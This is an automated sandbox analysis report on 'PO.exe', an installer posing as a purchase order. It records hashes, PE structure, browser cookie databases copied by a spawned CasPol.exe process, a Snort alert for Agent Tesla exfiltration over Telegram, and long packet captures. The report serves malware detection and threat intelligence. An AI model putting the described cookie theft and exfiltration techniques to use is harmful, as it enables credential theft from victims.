Preview:	L..................F........................................................#....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....\.2...........TOBEN.txt.D............................................T.O.B.E.N...t.x.t...........\.T.O.B.E.N...t.x.t.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\PO.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	11776
Entropy (8bit):	5.6557532861400945
Encrypted:	false
SSDEEP:	192:eK24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlASl:u8QIl975eXqlWBrz7YLOlA
MD5:	0FF2D70CFDC8095EA99CA2DABBEC3CD7
SHA1:	10C51496D37CECD0E8A503A5A9BB2329D9B38116
SHA-256:	982C5FB7ADA7D8C9BC3E419D1C35DA6F05BC5DD845940C179AF3A33D00A36A8B
SHA-512:	CB5FC0B3194F469B833C2C9ABF493FCEC5251E8609881B7F5E095B9BD09ED468168E95DDA0BA415A7D8D6B7F0DEE735467C0ED8E52B223EB5359986891BA6E2E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: RFQ Maranata -Madrid S.L(spares and equipment).exe, Detection: malicious, Browse Filename: RFQ Maranata -Madrid S.L(spares and equipment).exe, Detection: malicious, Browse Filename: Bestellingen voor november.exe, Detection: malicious, Browse Filename: Bestellingen voor november.exe, Detection: malicious, Browse Filename: pK4MWvGh3W.exe, Detection: malicious, Browse Filename: pK4MWvGh3W.exe, Detection: malicious, Browse Filename: unsere Anfrage von.exe, Detection: malicious, Browse Filename: unsere Anfrage von.exe, Detection: malicious, Browse Filename: Nowe zapytanie projektowe do wyceny.PDF.exe, Detection: malicious, Browse Filename: Nowe zapytanie projektowe do wyceny.PDF.exe, Detection: malicious, Browse Filename: Nowe zapytanie projektowe do wyceny.PDF.exe, Detection: malicious, Browse Filename: Bathroom Product List.exe, Detection: malicious, Browse Filename: Bathroom Product List.exe, Detection: malicious, Browse Filename: #U00d6deme belgesi 10.12.2022_pdf.exe, Detection: malicious, Browse Filename: #U00d6deme belgesi 10.12.2022_pdf.exe, Detection: malicious, Browse Filename: RFQ.doc, Detection: malicious, Browse Filename: Zahlungsbesttigung.doc, Detection: malicious, Browse Filename: RFQ 0102022.exe, Detection: malicious, Browse Filename: RFQ 0102022.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....z.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hw3hufbj.yur\Chrome\Default\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 36, database pages 24, 1st free page 14, free pages 11, cookie 0x5, schema 4, UTF-8, version-valid-for 36
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	2.9216957692876595
Encrypted:	false
SSDEEP:	384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
MD5:	1A706D20E96086886B5D00D9698E09DF
SHA1:	DACF81D90647457585345BEDD6DE222E83FDE01F
SHA-256:	759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
SHA-512:	CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
Malicious:	false
Preview:	SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hw3hufbj.yur\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.435141913006391
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO.exe
File size:	269537
MD5:	9297126fd9624f7dc2d4f64f072668a2
SHA1:	c30b3c8fddd49f7dfba687026daf6293f6d90b1b
SHA256:	edd8e1858bcc704fdea75837bb448eceda61317e7f8028e82aa2a0e5559c658a
SHA512:	57fd81274b3f16cb8f0056c9afe2c697649db154c12e63a4ed8bad65ccb6b598845adce9883bd2695335e05e8f3c877fc9f2e32a637c01e170d0b671e32c6d0b
SSDEEP:	6144:DB+pqUiH1YF0tV1R5nqyw8TqwiV6lMATl:DgcHyF+Hqyw83iLATl
TLSH:	39448B147A6CE127F11AC6709B52AD1B7E783F040865D203BEC4FB5E353B14299FA26B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@

File Icon


Icon Hash:	b474f4c4c4c4c4d4

Static PE Info

General

Entrypoint:	0x4033b6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57017AB0 [Sun Apr 3 20:18:56 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4ea4df5d94204fc550be1874e1b77ea7

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007FFA70B1BD33h
push ebx
call 00007FFA70B1EE8Ch
cmp eax, ebx
je 00007FFA70B1BD29h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007FFA70B1EE06h
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FFA70B1BD0Ch
push ebp
push 00000009h
call 00007FFA70B1EE5Eh
push 00000007h
call 00007FFA70B1EE57h
mov dword ptr [0042A244h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [0042A2F8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h
push 00429240h
call 00007FFA70B1EA40h
call dword ptr [004080ACh]
mov ebp, 00435000h
push eax
push ebp
call 00007FFA70B1EA2Eh
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6c000	0x19f28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x615d	0x6200	False	0.6616709183673469	data	6.45041359169741	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x13a4	0x1400	False	0.4529296875	data	5.163001655755973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	False	0.5026041666666666	data	3.9824009583068882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x41000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6c000	0x19f28	0x1a000	False	0.062424879807692304	data	2.7337265494354486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x6c358	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States
RT_ICON	0x6c6c0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States
RT_ICON	0x7cee8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States
RT_ICON	0x81110	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States
RT_ICON	0x836b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States
RT_ICON	0x84760	0x9ee	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x85150	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States
RT_DIALOG	0x855b8	0x144	data	English	United States
RT_DIALOG	0x85700	0x13c	data	English	United States
RT_DIALOG	0x85840	0x100	data	English	United States
RT_DIALOG	0x85940	0x11c	data	English	United States
RT_DIALOG	0x85a60	0xc4	data	English	United States
RT_DIALOG	0x85b28	0x60	data	English	United States
RT_GROUP_ICON	0x85b88	0x5a	data	English	United States
RT_MANIFEST	0x85be8	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20149.154.167.220498544432851779 11/29/22-22:50:36.593124	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49854	443	192.168.11.20	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 22:48:56.877616882 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:56.877716064 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:56.877887964 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:56.908607960 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:56.908684015 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:56.957823992 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:56.958023071 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.067698002 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.067722082 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.068057060 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.068178892 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.072216988 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.112457991 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136059046 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136152029 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136217117 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136225939 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.136249065 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136323929 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.136369944 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136431932 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136507988 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.136516094 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136528015 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136554956 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.136635065 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.136635065 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136694908 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136826992 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.136826992 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.136838913 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.136847973 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.137010098 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.137010098 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.137022972 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.137036085 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.137248993 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.137248993 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.137258053 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.137568951 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.137614012 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.137625933 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.137691021 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.137804985 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.137813091 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.137996912 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.137996912 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.138003111 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.138344049 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.144891977 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.145090103 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.145133018 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.145158052 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.145361900 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.145381927 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.145440102 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.145677090 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.145677090 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.145699978 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.145767927 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.145921946 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.146023989 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.146023989 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.146043062 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.146117926 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.146148920 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.146311998 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.146394014 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.146394968 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.146486998 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.146533966 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.146648884 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.146712065 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.146754026 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.146883011 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.146934986 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.147067070 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147093058 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.147118092 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.147255898 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147255898 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147295952 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.147439003 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147481918 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.147521973 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147574902 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.147703886 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147705078 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147754908 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.147896051 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147907972 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.147937059 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.147964001 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.148104906 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.148106098 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.148155928 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.148188114 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.148289919 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.148339033 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.148468971 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.148658037 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.154212952 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.154376030 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.154376984 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.154412031 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.154449940 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.154506922 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.154645920 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.154669046 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.154732943 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.154787064 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.154850960 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.155004025 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.155004978 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.155042887 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.155179977 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.155349016 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.155373096 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.155405045 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.155601978 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.155675888 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.155734062 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.155968904 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.155968904 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.156021118 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.156338930 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.156344891 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.156382084 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.156569004 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.156754017 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.156827927 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.156886101 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.156939030 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.157079935 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.157094002 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.157123089 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.157299042 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.157299042 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.157299042 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.157485008 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.158019066 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.158174992 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.158198118 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.158251047 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.158301115 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.158394098 CET	443	49847	162.159.133.233	192.168.11.20
Nov 29, 2022 22:48:57.158483028 CET	49847	443	192.168.11.20	162.159.133.233
Nov 29, 2022 22:48:57.158483028 CET	49847	443	192.168.11.20	162.159.133.233
